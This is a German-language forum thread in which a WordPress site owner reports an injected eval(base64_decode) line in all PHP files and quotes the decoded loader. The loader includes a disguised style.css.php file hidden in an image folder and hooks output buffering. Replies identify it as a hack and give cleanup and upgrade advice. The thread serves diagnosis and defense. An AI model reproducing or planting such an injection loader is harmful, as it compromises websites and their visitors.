Base64-Code in alle PHP-Docs

  • Hallo zusammen,

    mir ist aufgefallen, dass seit kurzer Zeit in sämtlichen PHP-Docs zu Beginn ein Text steht, der folgendermaßen beginnt:

    PHP
    eval(base64_decode('aWYoZnVuY3Rpb25f...


    Ich habe mir den Text auch dekodiert, kann ihn aber immer noch nicht verstehen. Ich stelle den Text hier anonymisiert rein:

    Code
    if(function_exists('ob_start')&&!isset($GLOBALS['mfsn'])){$GLOBALS['mfsn']='/kunden/homepages/10/dxxxxx/htdocs/xxxx-blog/wordpress/wp-includes/js/tinymce/plugins/inlinepopups/skins/clearlooks2/img/style.css.php';if(file_exists($GLOBALS['mfsn'])){include_once($GLOBALS['mfsn']);if(function_exists('gml')&&function_exists('dgobh')){ob_start('dgobh');}}}

    Der Pfad, der hier angegeben ist, führt zu einem CSS.php-Dokument, das wiederum einen viel längeren eval(base64_decode...)-Text enthält, den ich bisher nicht dekodieren kann.
    Interessanterweise sind in dem Ordner, in dem das Dokument liegt, lediglich gifs (ältere Back-Ups zeigen auch, dass es bis vor zwei Monaten tatsächlich nur gifs in diesem Ordner gab)
    Ich würde mich freuen, wenn mir jemand erklären kann, was dieser Text bedeutet, ob das gefährlich ist und bspw. mit dem Plug-In "Antivirus für Wordpress" die Dateien wieder zu bereinigen sind?

    • Anzeige

    Hallo!

    Wenn du gerade an deiner Website arbeitest oder dein aktuelles Hosting überdenkst: Wir betreiben mit NetzLiving eine Hosting-Plattform, die speziell auf Performance, Sicherheit und einfache Verwaltung ausgelegt ist.

    • ✔️ Schnelle Ladezeiten (optimiert für WordPress & Co.)
    • ✔️ Deutsche Server & DSGVO-konform
    • ✔️ Persönlicher Support (kein 0815-Ticket-System)

    Mehr erfahren

  • Sieht für mich nach einem Hack aus. Anleitungen zur generellen Beseitigung von Hacks sollten zu finden sein, im Forum und per Google. Verwendest Du die aktuelle WP-Version?

  • Nein, benutze WP 2.6
    Habe allerdings gerade auf 2.9.1 upgedated und nun erstmal alles wieder runtergeschmissen. Warte noch darauf, dass mir 1&1 zwei Dateien löscht, die sich verselbständigt haben und sich von mir nicht löschen lassen. Dann werde ich es noch einmal probieren WP 2.9.1 hochzuladen und die Datenbank wieder reinzuladen.
    Hoffe dann auch diesen Hack rauszubekommen.
    Was fürn Ärger

  • Ja gut, wenn in WP Sicherheitslücken gefunden werden ist das zwar ärgerlich, aber eben eine Tatsache. Da hilft dann nur upgraden. Wenn Du Dich also entscheidest, den Update-Hinweis zu ignorieren, dann tue das bitte nur nach einer kurzen Recherche, ob das Update sicherheitsrelevant ist. 2.8 auf 2.9 ist z.B. wurscht, da hatte ich auch noch keine Zeit zu. 2.7 auf 2.8 war nicht egal, da wurden Sicherheitslücken gestopft.

    Vorgehen bei Hacks hatte ich übrigens generell vor kurzem gerade erst hier beschrieben: http://forum.wordpress-deutschland.org/installation/6…html#post303406
    Das hilft Dir vielleicht noch etwas bei der Entscheidung, welche Files gelöscht werden müssen und welche nicht. Je mehr Du frisch aus einer sauberen Quelle hochladen kannst, desto besser. Upload-Dateien aus einem Backup überschreiben ist z.B. auch gut, manchmal werden da einfach Dateien dazwischen gelegt, die Du zwischen Dutzenden legitimen Uploads nicht erkennst.

  • Ja gut, wenn in WP Sicherheitslücken gefunden werden ist das zwar ärgerlich, aber eben eine Tatsache. Da hilft dann nur upgraden. Wenn Du Dich also entscheidest, den Update-Hinweis zu ignorieren, dann tue das bitte nur nach einer kurzen Recherche, ob das Update sicherheitsrelevant ist.

    Stimmt, die beste Sicherheit der Basisinstallation nutzt allerdings nichts solange ein großer Teil der für Wordpress verfügbaren Plugins löchriger ist als ein Schweizer Käse.

Jetzt mitmachen!

Sie haben noch kein Benutzerkonto auf unserer Seite? Registrieren Sie sich kostenlos und nehmen Sie an unserer Community teil!